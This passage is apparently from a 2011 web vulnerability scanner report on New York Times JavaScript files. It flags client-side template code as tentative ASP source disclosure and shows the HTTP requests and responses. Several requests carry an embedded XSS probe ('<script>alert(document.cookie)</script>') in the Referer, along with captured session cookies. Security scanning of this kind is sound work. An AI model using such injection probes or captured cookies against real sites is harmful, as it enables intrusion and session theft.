                                               <div class="reportAbuse"> \
                                           <% if(dataForTemplate.reportAbuseFlag == true) { %> \
                                                       <span class="flagged">
...[SNIP]...
</span> \
                                           <% } else { %> \
                                                       <a href="#" id="<%= dataForTemplate.commentSequence %>" onclick="NYTD.CRNR.overlay.appear(event);return false;">
...[SNIP]...
<a href="<%= dataForTemplate.overflowPageURL %>?permid=<%= dataForTemplate.commentSequence %>#comment<%= dataForTemplate.commentSequence %>" name="comment<%= dataForTemplate.commentSequence %>"><%= dataForTemplate.commentSequence %></a>.</div> \
           <div class="date"><%= dataForTemplate.approveDate %></div>\n<div class="time"><%= dataForTemplate.approveTime %></div>
...[SNIP]...
<div class="reply clearfix <%= dataForTemplate.editorSelection %>">
...[SNIP]...
<img src="<%= dataForTemplate.imageHost %>/images/global/icons/t_icon_16x16.gif">
...[SNIP]...
<div class="displayName"> \
               <% if(dataForTemplate.userURL) { %> \
                   <a href="<%= dataForTemplate.userURL %>"><%= dataForTemplate.userDisplayName %></a> \
               <% } else { %> \
                   <%= dataForTemplate.userDisplayName %> \
               <% } %>
...[SNIP]...
<div class="location"><%= dataForTemplate.userTitle %></div> \
           <div class="date"><%= dataForTemplate.approveDate %></div> \
           <div class="time"><%= dataForTemplate.approveTime %></div>
...[SNIP]...
<div class="reviewText"><%= dataForTemplate.commentBody %></div>
...[SNIP]...
<a title="Click here to suggest a correction" href="<%= dataForTemplate.myaccountHost %>/membercenter/feedback.html" id="suggestCorrectionsLink">Suggest a Correction to This <%= dataForTemplate.suggestionAsset %> &#x00bb;</a></h2></div> \
       <% if(dataForTemplate.userStatus) { %> \
           <p>
...[SNIP]...
<span class="userName"> <%= dataForTemplate.UserLoginId %></span>
...[SNIP]...
<input type="text" id="userDisplayName" value="<%= dataForTemplate.userDisplayName %>" name="userDisplayName"/>
...[SNIP]...
<input type="text" id="userLocation" value="<%= dataForTemplate.userLocation %>" name="userLocation"/>
...[SNIP]...
<input type="checkbox" class="displayInline" id="emailNotifyStatus" name="emailNotifyStatus" value="true" <%= dataForTemplate.checkBoxStatus %> /> \
                       <label class="displayInline" for="emailNotifyStatus">Send me a link to my published comment at <%= dataForTemplate.userEmail %> <a href=" http://www.nytimes.com/membercenter/">
...[SNIP]...
<input type="hidden" id="cNotify" name="cNotify" value="<%= dataForTemplate.checkBoxStatus %>"/> \
                       <input type="hidden" id="emailNotifyEmail" name="emailNotifyEmail" value="<%= dataForTemplate.userEmail %>">
...[SNIP]...
</p> \
       <% } else { %> \
           <p>You must <a href="http://www.nytimes.com/auth/login?URI=<%= dataForTemplate.currentURL %> ">
...[SNIP]...
<a href="http://www.nytimes.com/gst/regi.html?URI=<%= dataForTemplate.currentURL %>">
...[SNIP]...

16.3. http://graphics8.nytimes.com/js/app/community/V3/commonTemplates.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://graphics8.nytimes.com
Path:   /js/app/community/V3/commonTemplates.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/app/community/V3/commonTemplates.js HTTP/1.1
Host: graphics8.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 5611
Content-Type: application/x-javascript
Last-Modified: Tue, 21 Dec 2010 20:32:35 GMT
ETag: "15eb-4d110ee3"
Accept-Ranges: bytes
Cache-Control: private, max-age=371370
Date: Thu, 12 May 2011 11:03:08 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5611

/**
* $Id: commonTemplates.js 50880 2010-11-24 08:01:00Z pkarthik $
* NYTD Namespace is included in common.js
*/

NYTD.CRNR = window.NYTD.CRNR || {};

NYTD.CRNR.Templates = {
   CrnrTemplate: '
...[SNIP]...
<div class="header clearfix"> \
           <%= dataForTemplate.headerHtml %> \
           <%= dataForTemplate.crnrDataHtml %> \
           <%= dataForTemplate.footerHtml %> \
       </div>
...[SNIP]...
<div class="stars"> \
               <%= dataForTemplate.starsHtml %> \
           </div>
...[SNIP]...
</a> \
       <% if(dataForTemplate.showMessage == true) { %> \
           <div id="bozo"> \
               <% if(dataForTemplate.postCommentFlag == true) { %> \
                   <div id="postCommentLink"> \
                       <% if(dataForTemplate.vertical === "travel-suggestions") { %> \
                           <a title="Click here to submit another suggestion" href="#shareReview">
...[SNIP]...
</a> \
                       <% } else { %> \
                           <a title="Click here to submit another comment" href="#postComment">
...[SNIP]...
<div class="header" id="bozoDefault"> \
                   Thank you for your submission. Comments are moderated and generally will be posted if they are on-topic and not abusive. \
                   <% if(dataForTemplate.userEmailStatus == 1) { %> \
                       An email will be sent to you at <%= dataForTemplate.userEmail %> <a href="http://www.nytimes.com/membercenter/">
...[SNIP]...
<h3> \
                   <% if(dataForTemplate.titleFlag == true) { %> \
                       <% if(dataForTemplate.vertical === "travel-suggestions") { %> \
                           Your Submitted Suggestions \
                       <% } else { %> \
                           Your Submitted Review \
                       <% } %> \
                   <% } else { %> \
                       Your Submitted Comments \
                   <% } %>
...[SNIP]...
</div> \
       <% } else { %> \
           <div id="bozo" class="hide hidden hideContent">
...[SNIP]...
<div <%= dataForTemplate.firstBozoComment %> class="bozoComment">
...[SNIP]...
<p> \
                       <% if(dataForTemplate.shareTP == true) { %> \
                           <a href="http://timespeople.nytimes.com/view/user/<%= dataForTemplate.userID %>/activities.html"><%= dataForTemplate.userDisplayName %></a> \
                       <% } else { %> \
                           <%= dataForTemplate.userDisplayName %> \
                       <% } %>
...[SNIP]...
<div class="secondColumn"> \
                   <%= dataForTemplate.userRatingHTML %> \
                   <h4>
...[SNIP]...
<p><%= dataForTemplate.userLocation %></p> \
               </div> \
               <% if(dataForTemplate.titleFlag == true) { %> \
                   <div class="clearfix">
...[SNIP]...
<p><%= dataForTemplate.commentTitle %></p> \
                   </div> \
                   <% if(dataForTemplate.vertical === "travel-suggestions") { %> \
                       <h4>
...[SNIP]...
</h4> \
                   <% } else { %> \
                       <h4>
...[SNIP]...
<% } %> \
               <% } else { %> \
                   <h4>
...[SNIP]...
<p><%= dataForTemplate.commentBody %></p>
...[SNIP]...
<div class="header" id="bozoDefault"> \
           Thank you for your submission. Comments are moderated and generally will be posted if they are on-topic and not abusive. \
           <% if(dataForTemplate.commentNotify == true) { %> \
               An email will be sent to you at <%= dataForTemplate.userEmail %> <a href="http://www.nytimes.com/membercenter/">
...[SNIP]...
<h3> \
           <% if(dataForTemplate.titleFlag == true) { %> \
               <% if(dataForTemplate.vertical === "travel-suggestions") { %> \
                   Your Submitted Suggestion \
               <% } else { %> \
                   Your Submitted Review \
               <% } %> \
           <% } else { %> \
               Your Submitted Comment \
           <% } %>
...[SNIP]...
<p><%= dataForTemplate.userDisplayName %></p>
...[SNIP]...
<div class="secondColumn"> \
               <%= dataForTemplate.userRatingHTML %> \
               <h4>
...[SNIP]...
<p><%= dataForTemplate.userLocation %></p> \
           </div> \
           <% if(dataForTemplate.titleFlag == true) { %> \
               <div class="clearfix">
...[SNIP]...
<p><%= dataForTemplate.title%></p> \
               </div> \
               <% if(dataForTemplate.vertical === "travel-suggestions") { %> \
                   <h4>
...[SNIP]...
</h4> \
               <% } else { %> \
                   <h4>
...[SNIP]...
<% } %> \
           <% } else { %> \
               <h4>
...[SNIP]...
<p><%= dataForTemplate.commentBody %></p>
...[SNIP]...
</span> \
           <%= dataForTemplate.starsHtml %> \
       </div>
...[SNIP]...
<h3> \
           <% if(dataForTemplate.titleFlag == true) { %> \
               <% if(dataForTemplate.vertical === "travel-suggestions") { %> \
                   Your Submitted Suggestion \
               <% } else { %> \
               Your Submitted Review \
               <% } %> \
           <% } else { %> \
               Your Submitted Comments \
           <% } %>
...[SNIP]...
<embed src="<%= dataForTemplate.imageHost %>/images/apps/mytimes/spinner.swf" height="20" style="width:100%;"/>
...[SNIP]...

16.4. http://graphics8.nytimes.com/js/app/community/V3/recommender.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://graphics8.nytimes.com
Path:   /js/app/community/V3/recommender.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/app/community/V3/recommender.js HTTP/1.1
Host: graphics8.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 4230
Content-Type: application/x-javascript
Last-Modified: Tue, 05 Apr 2011 11:57:38 GMT
ETag: "1086-4d9b03b2"
Accept-Ranges: bytes
Cache-Control: private, max-age=133403
Date: Thu, 12 May 2011 11:03:07 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4230

/**
* $Id: recommender.js 63302 2011-03-30 06:41:04Z manu.mohan $
* REQUIRES: /js/app/common/communityXHR.js
* NYTD Namespace is included in common.js
*/

NYTD.CRNR = window.NYTD.CRNR || {};
...[SNIP]...
<span class="link">\
<% if(!dataForTemplate.recommended) { %>\
<span class="left"><%= dataForTemplate.unicodeSpace %></span>
...[SNIP]...
<a href="javascript:NYTD.CRNR.recommender.request(<%= dataForTemplate.commentSequence %>, <%= dataForTemplate.recommended %>);"\
<% if(dataForTemplate.recommended) {%> class="recommended" onmouseover="tooltip.extShow(this,&#39;Undo your recommendation.&#39;,&#39;autoWidth&#39;,15,15);" onmouseout="tooltip.rollout();"<% }%> >\
<% if(dataForTemplate.recommended) {%> Recommended <% }else { %> Recommend <% } %>
...[SNIP]...
</a>\
<% if(!dataForTemplate.recommended) { %>\
</span>
...[SNIP]...
<span class="right"><%= dataForTemplate.unicodeSpace %></span>
...[SNIP]...
<span <% if(!dataForTemplate.recommended) {%> class="caption" <% } %> >\
Recommended by <%= dataForTemplate.recommendations %> Reader<% if(dataForTemplate.recommendations > 1) { %>s<% } %>
...[SNIP]...

16.5. http://graphics8.nytimes.com/js/app/lib/NYTD/0.0.1/template.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://graphics8.nytimes.com
Path:   /js/app/lib/NYTD/0.0.1/template.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/app/lib/NYTD/0.0.1/template.js HTTP/1.1
Host: graphics8.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topicse7f31%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed4e86dd7255/mergers-acquisitions/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=53C30AB57480F9FF91684174FCA4F3EF&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.13.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305122094061:ss=1305120271481; rsi_segs=D08734_70010|D08734_70105|H07707_11028|H07707_11029|H07707_11044|H07707_11048; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 1250
Content-Type: application/x-javascript
Last-Modified: Thu, 11 Dec 2008 17:36:12 GMT
ETag: "4e2-49414f8c"
Accept-Ranges: bytes
Cache-Control: private, max-age=65579
Date: Thu, 12 May 2011 11:25:53 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1250


// Simple JavaScript Templating
// John Resig - http://ejohn.org/ - MIT Licensed
// Modified to sit happily in our NYTD Namespace
(function(){
var cache = {};

NYTD.Template = function(str, data
...[SNIP]...
he data as local variables using with(){}
"with(obj){p.push('" +

// Convert the template into pure JavaScript
str
.replace(/[\r\t\n]/g, " ")
.split("<%").join("\t")
.replace(/((^|%>
)[^\t]*)'/g, "$1\r")
.replace(/\t=(.*?)%>
...[SNIP]...

16.6. http://graphics8.nytimes.com/js/app/timespeople/activities/1.6/activities.build.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://graphics8.nytimes.com
Path:   /js/app/timespeople/activities/1.6/activities.build.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/app/timespeople/activities/1.6/activities.build.js HTTP/1.1
Host: graphics8.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topicse7f31%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed4e86dd7255/mergers-acquisitions/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=D72AE6ABBF59ABA913779248634DD9BA&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.14.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305122094061:ss=1305120271481; rsi_segs=D08734_70010|D08734_70105|H07707_11028|H07707_11029|H07707_11044|H07707_11048; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 43493
Content-Type: application/x-javascript
Last-Modified: Mon, 02 May 2011 19:52:33 GMT
ETag: "a9e5-4dbf0b81"
Accept-Ranges: bytes
Cache-Control: private, max-age=315623
Date: Thu, 12 May 2011 11:25:58 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 43493

/*
$Id: activities.build.js 65714 2011-04-22 15:26:35Z alex.wallace $
(c) 2008 The New York Times Company
*/

/*
Determining page group, type, title and descriptions based on META tags
*/
TimesPeople.
...[SNIP]...
<span><%= label %></span>
...[SNIP]...
<span><%= label %></span>
...[SNIP]...

16.7. http://graphics8.nytimes.com/js/app/timespeople/toolbar/1.7/toolbar.build.min.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://graphics8.nytimes.com
Path:   /js/app/timespeople/toolbar/1.7/toolbar.build.min.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/app/timespeople/toolbar/1.7/toolbar.build.min.js HTTP/1.1
Host: graphics8.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topicse7f31%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed4e86dd7255/mergers-acquisitions/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=53C30AB57480F9FF91684174FCA4F3EF&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.13.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305122094061:ss=1305120271481; rsi_segs=D08734_70010|D08734_70105|H07707_11028|H07707_11029|H07707_11044|H07707_11048; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 51838
Content-Type: application/x-javascript
Last-Modified: Tue, 22 Mar 2011 19:15:30 GMT
ETag: "ca7e-4d88f552"
Accept-Ranges: bytes
Cache-Control: private, max-age=65593
Date: Thu, 12 May 2011 11:25:57 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 51838

var TimesPeople=TimesPeople||{};if(typeof Object.create!=="function"){Object.create=function(o){function F(){}F.prototype=o;return new F()}}(function(app){var debug=false;if(typeof console=="undefined
...[SNIP]...
le);(function(app){var cache={};app.template=function(str,data){var fn=new Function("obj","var p=[],print=function(){p.push.apply(p,arguments);};with(obj){p.push('"+str.replace(/[\r\t\n]/g," ").split("<%").join("\t").replace(/((^|%>)[^\t]*)'/g,"$1\r").replace(/\t=(.*?)%>
...[SNIP]...
<div id="TP_container_shadow"<% if (!hasNativeShadow) { %> class="border-shadow"<% } %>
...[SNIP]...
<a href="<%= userpage %>"><img class="TP_avatar" src="<%= picURL %>">
...[SNIP]...
<a class="TP_user" href="<%= userpage %>"><%= actorDisplayname %></a> <%= verb %><%= punctuation %> </span>
...[SNIP]...
<a origin="tp" href="<%= object_url %>" title="<%= object %>"><%= truncated_object %></a></span> <% if (object_note) { %> <img src="<%= TimesPeople.Config.image_host + TimesPeople.Config.image_path %>toolbar/1.5/annotation.gif">
...[SNIP]...
<% } %> <% if (display_annotations && object_note) { %> <p class="TP_annotation">&ldquo;<%= object_note %>&rdquo;</p>
...[SNIP]...
<td class="TP_timestamp_cell"><%= date %></td>
...[SNIP]...
<a href="<%= userpage %>"><img class="TP_avatar" src="<%= picURL %>">
...[SNIP]...
<a class="TP_user" href="<%= userpage %>"><%= actorDisplayname %></a> <%= verb %></span> <% if (object_note) { %> <img src="<%= TimesPeople.Config.image_host + TimesPeople.Config.image_path %>toolbar/1.5/annotation.gif">
...[SNIP]...
<% } %> <% if (object_note) { %> <p class="TP_annotation">&ldquo;<%= object_note %>&rdquo;</p>
...[SNIP]...
<a href="<%= userpage %>"><img class="TP_avatar you" src="<%= picURL %>"></a> <h4 class="TP_header"> <% if (userpage) { %> <a href="<%= userpage %>"> <%= displayname %> </a> <% } else { %> <%= displayname %> <% } %>
...[SNIP]...
<p class="TP_following_count"> <% if (followers_url) { %> <a href="<%= followers_url %>"> <%= people_count %> </a> <% } else { %> <%= people_count %> <% } %>
...[SNIP]...
<div class="TP_drawer_tooltip_inner"> <%= tooltipText %> </div>
...[SNIP]...
<h4><%= openText %></h4>
...[SNIP]...

16.8. http://graphics8.nytimes.com/js2/lib/facebook/article/1.0/build.min.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://graphics8.nytimes.com
Path:   /js2/lib/facebook/article/1.0/build.min.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js2/lib/facebook/article/1.0/build.min.js HTTP/1.1
Host: graphics8.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 20078
Content-Type: application/x-javascript
Last-Modified: Thu, 05 May 2011 18:59:30 GMT
ETag: "4e6e-4dc2f392"
Accept-Ranges: bytes
Cache-Control: private, max-age=2394
Date: Thu, 12 May 2011 11:02:58 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 20078

NYTD.track=function(){if("dcsMultiTrack" in window){dcsMultiTrack.apply(this,arguments)}else{setTimeout(function(){NYTD.track.apply(this,arguments)},1000)}};NYTD.Facebook={APP_ID:"9869919170",API_KEY:
...[SNIP]...
<div class="activity"> <% if (user.image) { %> <img class="userImage" height="25" width="25" src="<%= user.image %>" />
...[SNIP]...
<a href="<%= user.href %>"><%= user.name %></a>
...[SNIP]...
<a href="<%= url %>"><%= title %></a>
...[SNIP]...
<a href="<%= url %>"><%= title %></a>
...[SNIP]...
<div class="activity"> <% if (img) { %> <img class="runaroundRight" height="50" width="50" src="<%= img %>" />
...[SNIP]...
<a href="<%= url %>"><%= title %></a>
...[SNIP]...
<span><%= label %></span>
...[SNIP]...

16.9. https://myaccount.nytimes.com/js/adx/googleads.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://myaccount.nytimes.com
Path:   /js/adx/googleads.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/adx/googleads.js HTTP/1.1
Host: myaccount.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://myaccount.nytimes.com/auth/login?URI=http://dealbook.nytimes.com/category/main-topicse7f31%2522%253E%253Cscript%253Ealert%25281%2529%253C/script%253Ed4e86dd7255/mergers-acquisitions/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=ABBCA6EE6FB956FC70EF4BEBA92D8B48&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.15.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199607199:ss=1305199567634; rsi_segs=D08734_70010|D08734_70105|H07707_11028|H07707_11029|H07707_11044|H07707_11048; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 12 May 2011 11:27:08 GMT
Content-type: application/x-javascript
Last-modified: Wed, 06 Apr 2011 17:22:29 GMT
ntCoent-length: 17979
Etag: "463b-4d9ca155"
Accept-ranges: bytes
Cache-Control: private
Content-Length: 17979

/*global NYTD, window, escape */
/*    
$Id: googleads.js 62412 2011-03-23 20:10:19Z helckt $    
(c) 2010 The New York Times Company    
*/


NYTD.GoogleAds = NYTD.GoogleAds || {
   
   defaultGoogleParam
...[SNIP]...
<a href="#" onclick="linkbox(\'<%=url%>\',\'popWin\')">
...[SNIP]...
<span class="blue"><%=line1%></span><%=line2%><br/>'+
                   '<div class="link"><%=visibleUrl%></div>
...[SNIP]...
<a onclick="linkbox(\'<%=url%>\',\'popWin\')" class="blue" href="#"><%=line1%></a>' +
               '<br/><%=line2%><br/><%=line3%><br/>
...[SNIP]...
<a onclick="linkbox(\'<%=url%>\',\'popWin\')" class="green" href="#"><%=visibleUrl%></a>
...[SNIP]...
<a href="http://<%=queryHost%>/search/query?srchst=r&term=<%=term%>&google_ad_channel=health&' +
               'google_ad_client=ca-nytimes_radlinks_js&google_page_url=<%=thisPage%>">' +
                   '<%=term%>' +
               '</a>
...[SNIP]...
<tr class="listing" bidtype="<%=bidType%>" targetingType="<%=targetingType%>">
...[SNIP]...
<a class="first" target="_blank" href="<%=url%>"><%=line1%></a><br/>' +
                   '<%=line2%><br/>' +
                   '<%=line3%><br/>' +
                   '<a class="last" target="_blank" href="<%=url%>"><%=visibleUrl%></a>
...[SNIP]...
<a href="<%=url%>" target="_top" title="go to <%=visibleUrl%>" bidtype="<%=bidType%>" targetingType="<%=targetingType%>">' +
                   '<img border="0" src="<%=imageUrl%>" width="<%=imageWidth%>" height="<%=imageHeight%>">
...[SNIP]...
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="<%=imageWidth%>" height="<%=imageHeight%>" bidtype="<%=bidType%>" targetingType="<%=targetingType%>">' +
                   '<param name="movie" value="<%=imageUrl%>">
...[SNIP]...
<embed src="<%=imageUrl%>" width="<%=imageWidth%>" height="<%=imageHeight%> type="application/x-shockwave-flash" AllowScriptAccess="never" pluginspage="http://www.macromedia.com/go/getflashplayer">
...[SNIP]...

16.10. https://myaccount.nytimes.com/js/app/lib/NYTD/0.0.1/template.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://myaccount.nytimes.com
Path:   /js/app/lib/NYTD/0.0.1/template.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/app/lib/NYTD/0.0.1/template.js HTTP/1.1
Host: myaccount.nytimes.com
